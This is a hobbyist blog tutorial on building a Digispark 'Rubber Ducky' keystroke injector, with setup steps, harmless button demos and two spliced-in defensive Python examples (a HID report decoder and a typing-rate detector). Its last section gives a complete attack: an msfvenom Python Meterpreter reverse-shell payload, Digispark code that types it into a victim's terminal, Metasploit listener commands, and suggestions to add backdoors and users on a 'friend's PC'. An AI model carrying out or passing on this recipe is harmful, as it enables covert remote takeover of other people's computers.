Arduino Rubber Ducky Introduction

Hey guys, let’s get our hands dirty. Ever heard of the USB Rubber Ducky? Simply put, it is a programmed USB keyboard in the form of a pen drive. It sends keystrokes to the device it is connected to and can be used to prank or even hack unlocked PCs.

Would you believe me if I said we can do it with a $1.5 Arduino-compatible board and simple coding, without detailed knowledge of how USB works? Yes, you can make your own Arduino Rubber Ducky!

What you will learn?

In this post, I am going to show you how you can do cool stuff using the Arduino HID functionality. You can make your Arduino work as a keyboard or as a mouse and do pretty cool stuff with the push of a button.

Arduino Rubber Ducky Video Tutorial

I will be showing you how you can literally hack a PC and control it remotely using this tiny board. I will share a complete tutorial, code, and circuit diagrams in the description! The code is also available on GitHub, so feel free to download, edit and add more functions to it. Let’s get started!

About Our Sponsor – PCBWay

This project is sponsored by PCBWay. PCBWay is a PCB manufacturer specializing in PCB prototyping, low-volume production and neat and tidy PCB Assembly. They deliver high quality PCB faster and cheaper. 

As one of the most experienced PCB manufacturers in China, they pride themselves on being our best business partners as well as good friends in every aspect of your PCB needs.

Digispark – Explained

This is Digispark. It is a lightweight microcontroller development board. It comes with 6 GPIO pins, I2C and SPI serial communication and a USB interface.

It also has 3 PWM pins which can be used to control L293D motor drivers or servo motors. We can use the Arduino IDE to program Digispark, but the way we upload the program is a little bit different than usual.

Here, I have explained everything from the Digispark introduction to the first code upload. Check it out if you are interested!

Digispark as HID

This board can also act as an HID. HIDs, or Human Interface Devices, are devices that take input from us and pass it on to the machine they are connected to. HID devices include keyboards, joysticks, mice, touchpads, graphics tablets, etc.

Let’s make use of this functionality and have some fun.

Steps – Arduino Rubber Ducky

Step 1 – The Circuit

Circuit Explained

I have designed a PCB that has some buttons so that I can run multiple codes without reprogramming the Digispark.

This is the circuit. Since we have 5V coming out of the USB port, we don’t need an additional supply. Here we have some switches, resistors, and indicator LEDs. I will share the link to the PCB files in the description.

Getting the PCBs Done

Getting the PCB from PCBWay

To order your PCB from PCBWay, go to PCBWay and fill in the board details in the instant order form.

From there you will be directed to a form where you can provide more elaborate board details and upload your Gerber files.

Update your board requirement information in the PCB Specification screen.

You can change the board thickness, board color, silk color, and even the type of finish you want. Some of these add-ons are going to increase the board cost.

Once you have selected all of the options for your PCB, submit it for review. Before your board goes into manufacturing, their team of professional technicians will review your design for any potential errors.

Once the review is completed, all that is left is to add to the cart, make the payment, and wait for your PCBs to arrive. It could take anywhere from 3 to 6 days to be produced, depending on the number of boards you ordered.

Soldering

The PCB will be manufactured and shipped within days and will be delivered to your doorstep within the mentioned time period.

Once you get the PCB in hand, all you have to do is solder the header pins and connect all the components.

Step 2 – Installing Digispark Drivers

Now let’s install the drivers, board and library. Go to this link and download the drivers.

https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip

Extract it and install the drivers.

Step 3 – Install and Setting up Arduino IDE

Install Arduino

Download the Arduino IDE if you don’t have it. Download it from: https://www.arduino.cc/en/Main/Software

Install Board

Start the Arduino IDE, go to the “File” menu, select “Preferences” and paste this URL into the “Additional Boards Manager URLs” field.

http://digistump.com/package_digistump_index.json

Go to “Tools” menu and then the “Board” submenu – select “Boards Manager” and then select “Contributed”. Select the “Digistump AVR Boards” package and click the “Install” button.

Once it completes, close the “Boards Manager” window and go to Tools→Boards and select “Digispark (Default – 16.5mhz)”.

Install Library

Next we will install the Arduino DigiKeyboard library, which will make it easy for us to send HID commands to the PC using Digispark. This can be easily installed from the library manager itself.

Step 4 – Coding

Now we will start coding. Guys, these are all the keystrokes you can send to your PC from Digispark using the DigiKeyboard library. I will leave the link in the description because you will need it for coding!

DigiKeyboard Library Keystrokes

Special Keys

  • MOD_CONTROL_LEFT – Left Ctrl key
  • MOD_SHIFT_LEFT – Left Shift key
  • MOD_ALT_LEFT – Left Alt key
  • MOD_GUI_LEFT – Left Windows key
  • MOD_CONTROL_RIGHT – Right Ctrl key
  • MOD_SHIFT_RIGHT – Right Shift key
  • MOD_ALT_RIGHT – Right Alt key
  • MOD_GUI_RIGHT – Right Windows key

Alphabets

  • KEY_A
  • KEY_B
  • KEY_C
  • KEY_D
  • KEY_E
  • KEY_F
  • KEY_G
  • KEY_H
  • KEY_I
  • KEY_J
  • KEY_K
  • KEY_L
  • KEY_M
  • KEY_N
  • KEY_O
  • KEY_P
  • KEY_Q
  • KEY_R
  • KEY_S
  • KEY_T
  • KEY_U
  • KEY_V
  • KEY_W
  • KEY_X
  • KEY_Y
  • KEY_Z

Numbers

  • KEY_1
  • KEY_2
  • KEY_3
  • KEY_4
  • KEY_5
  • KEY_6
  • KEY_7
  • KEY_8
  • KEY_9
  • KEY_0

Functions

  • KEY_F1
  • KEY_F2
  • KEY_F3
  • KEY_F4
  • KEY_F5
  • KEY_F6
  • KEY_F7
  • KEY_F8
  • KEY_F9
  • KEY_F10
  • KEY_F11
  • KEY_F12

Don’t worry if this looks confusing, you will understand better when we look into our code. 

Basic Codes

First I will show you the basic setup. Basically, we have 4 different buttons. We will assign 1 task for each button so that when one button is pressed, it will run the corresponding function and execute the task. 

#include <DigiKeyboard.h>

int button1, button2, button3, button4;

void setup()
{
  // One input pin per push button
  pinMode(0, INPUT);
  pinMode(1, INPUT);
  pinMode(2, INPUT);
  pinMode(3, INPUT);
}

void loop()
{
  // Read the current state of each button
  button1 = digitalRead(0);
  button2 = digitalRead(1);
  button3 = digitalRead(2);
  button4 = digitalRead(3);

  // Run the task assigned to whichever button is pressed
  if (button1 == 1)
  {
    hello();
  }
  else if (button2 == 1)
  {
    lock();
  }
  else if (button3 == 1)
  {
    notepad();
  }
  else if (button4 == 1)
  {
    poweroff();
  }
}

// Type "Hello World" followed by Enter
void hello()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.println("Hello World");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(5000);
}

// Windows key + L locks the session
void lock()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_L, MOD_GUI_LEFT);
  DigiKeyboard.delay(5000);
}

// Windows key + R opens the Run dialog, then "notepad" + Enter starts Notepad
void notepad()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("notepad");
}

// Windows key + R, open cmd, then run the shutdown command
void poweroff()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("cmd");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("shutdown /s");
}

  • The first function sends the keystrokes for “Hello World”.
  • The second function sends the keystroke “Windows Button + L Key” to lock Windows.
  • The third function sends keystrokes to open Notepad.
  • The fourth function sends keystrokes to shut down the PC.

Let’s upload and check it out.

First press button 1 and yeah! It will print hello world. Now let’s try button 2, which will lock the PC. Now let’s try button 3. Cool, right? I will press button 4 at the end. Otherwise I will have to start everything all over again.

This way you can send keystrokes using your Arduino to do some useful stuff like media control, make your own keyboard, play pranks, or even hack PCs.
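For anyone reviewing a USB capture of an unfamiliar keyboard, the same key and modifier values can be read in the other direction to recover what the device typed. The following is an added example, not code from the original post or the DigiKeyboard library; it assumes the KEY_ and MOD_ constants listed above carry the standard USB HID keyboard usage IDs and modifier bits, and its function names and sample reports are constructed for illustration.

```python
# Added example: reconstruct what a keyboard typed from its HID reports.
# Usage IDs and modifier bits are the standard USB HID keyboard values; the
# sample reports are constructed, not captured from a real device.
MOD_BITS = {0x01: "CTRL", 0x02: "SHIFT", 0x04: "ALT", 0x08: "GUI",   # left keys
            0x10: "CTRL", 0x20: "SHIFT", 0x40: "ALT", 0x80: "GUI"}   # right keys
SPECIAL = {40: "<ENTER>", 44: " "}

def key_name(code):
    """Return (unshifted, shifted) text for one usage ID (US layout assumed)."""
    if 4 <= code <= 29:                          # KEY_A .. KEY_Z
        c = chr(ord("a") + code - 4)
        return c, c.upper()
    if 30 <= code <= 39:                         # KEY_1 .. KEY_9, KEY_0
        return "1234567890"[code - 30], "!@#$%^&*()"[code - 30]
    if 58 <= code <= 69:                         # KEY_F1 .. KEY_F12
        return (f"<F{code - 57}>",) * 2
    name = SPECIAL.get(code, f"<0x{code:02x}>")
    return name, name

def decode(reports):
    """Turn (modifier_byte, usage_id) pairs into a readable keystroke transcript."""
    out = []
    for mod, code in reports:
        if code == 0:                            # empty report: keys released
            continue
        plain, shifted = key_name(code)
        held = sorted({name for bit, name in MOD_BITS.items() if mod & bit})
        if held and held != ["SHIFT"]:           # shortcut such as GUI+R
            out.append("<" + "+".join(held + [plain.strip("<>").upper()]) + ">")
        else:
            out.append(shifted if held else plain)
    return "".join(out)

def sample_reports():
    """Constructed reports for: GUI+R, then 'notepad', then Enter."""
    typed = [(0x00, ord(c) - ord("a") + 4) for c in "notepad"]
    return [(0x00, 0), (0x08, 21)] + typed + [(0x00, 40)]

if __name__ == "__main__":
    print(decode(sample_reports()))
```
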

Taking Control over a PC

Now, as promised, I will show you how to take over an unlocked PC and gain remote access to it. Please note that this is only for educational purposes and to show you how dangerous this little thing can be.

For this part, you will need a Linux PC with Metasploit installed on it. The Metasploit framework is a collection of tools that can be used to write exploits and penetrate remote machines. This tool is pre-installed in Kali Linux. In a moment, I will show you how it is done.

Creating Payload

Next, we have to create code which, when executed on the victim’s machine, initiates a connection back to our PC.

In the terminal, execute the below command.

msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py

Here, LHOST is the IP ADDRESS OF YOUR MACHINE and
LPORT is the PORT FOR REVERSE SHELL TO CONNECT ON

This will create a payload named pythonpayload.py.

The contents of the file look somewhat like this:

The Arduino Code for Digispark Rubber Ducky

Now open that file and copy all the contents in the file as shown in the video.

Below is the code which is uploaded to the Digispark. Copy the contents of pythonpayload.py and paste it in the 9th line.

#include "DigiKeyboard.h"
void setup()
{
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("python ");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("Paste the python code here");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("quit()");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("exit");
}

void loop()
{
}

Basically, what this code does is

  • Wait for 2 seconds
  • Press ALT + CONTROL + T to open up the terminal
  • Wait for 2 seconds
  • Type in ‘python’ and Press Enter to start Python
  • Wait for 0.5 seconds
  • Type in the python exploit code and press enter to execute it
  • Wait for 1 second
  • Type ‘quit()’ and press enter to exit python
  • Wait for 0.5 seconds
  • Type exit and press enter to exit the terminal.

Now, upload the code.

Setting Up the Listener

Next, we have to start the listener, which will wait for incoming connections on the given port. Fire up Metasploit and execute the below commands in order.

msfconsole

use multi/handler

set PAYLOAD python/meterpreter/reverse_tcp

set LHOST <IP ADDRESS OF YOUR MACHINE>

set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>

exploit

This will start the listener.

Launch the Attack

Now all you have to do is connect this Digispark to the victim’s unlocked machine. All you need is a 10 second window. All the codes will run in 5 seconds.

Once you get the shell, you can do almost anything with that; create a persistent back door, upload or download files, create another user and provide it SSH access, possibilities are endless.
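From the defender's side, the run described above has a recognizable shape: a keyboard appears and, within seconds, types long bursts at a machine-steady rate separated by fixed pauses. The following added example (not part of the original post) scores key-press timestamps for that pattern; the thresholds, function names and sample timings are assumptions chosen for illustration, not measurements of a Digispark.

```python
# Added example: flag a keyboard whose typing is too fast and regular to be human.
# Thresholds and sample timestamps are assumptions/constructed, not measurements.
from statistics import mean, pstdev

MIN_BURST = 8          # keystrokes needed before a burst is judged
MAX_MEAN_GAP = 0.030   # seconds between keys; sustained human typing is slower
MAX_JITTER = 0.005     # seconds of std-dev; human rhythm varies more than this
ATTACH_WINDOW = 10.0   # seconds after the device appears that rate "high"

def bursts(times, pause=0.25):
    """Split key-down timestamps into runs separated by pauses (e.g. delay() calls)."""
    run = []
    for t in times:
        if run and t - run[-1] > pause:
            yield run
            run = []
        run.append(t)
    if run:
        yield run

def assess(attach_time, key_times):
    """Return one finding per machine-like burst typed by a single keyboard."""
    findings = []
    for run in bursts(sorted(key_times)):
        if len(run) < MIN_BURST:
            continue
        gaps = [b - a for a, b in zip(run, run[1:])]
        if mean(gaps) <= MAX_MEAN_GAP and pstdev(gaps) <= MAX_JITTER:
            soon = run[0] - attach_time <= ATTACH_WINDOW
            findings.append({"start": run[0], "keys": len(run),
                             "mean_gap": round(mean(gaps), 3),
                             "severity": "high" if soon else "medium"})
    return findings

def injected_sample():
    """Constructed: device attaches at t=100 s, types 7 keys, pauses, then 300 keys."""
    short = [102.0 + i * 0.02 for i in range(7)]
    long = [102.6 + i * 0.02 for i in range(300)]
    return 100.0, short + long

def human_sample():
    """Constructed: 40 keys with uneven gaps between 90 ms and 210 ms."""
    gaps, t, times = [0.14, 0.21, 0.09, 0.18, 0.12], 5.0, []
    for i in range(40):
        times.append(t)
        t += gaps[i % 5]
    return 0.0, times

if __name__ == "__main__":
    print(assess(*injected_sample()))
    print(assess(*human_sample()))
```

Timing alone is a heuristic: a device can be programmed to type slowly and unevenly, so this check complements locking unattended machines and restricting which USB keyboards are accepted.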

This code works if your friend’s PC uses Linux. Similarly, we can write code for Windows too. The Windows version will be updated in the link below. Follow the link in the description and you will find complete details on the project. The code is also available on GitHub, so feel free to download, edit and add more functions to it.

See you soon guys. See you in the next video. 
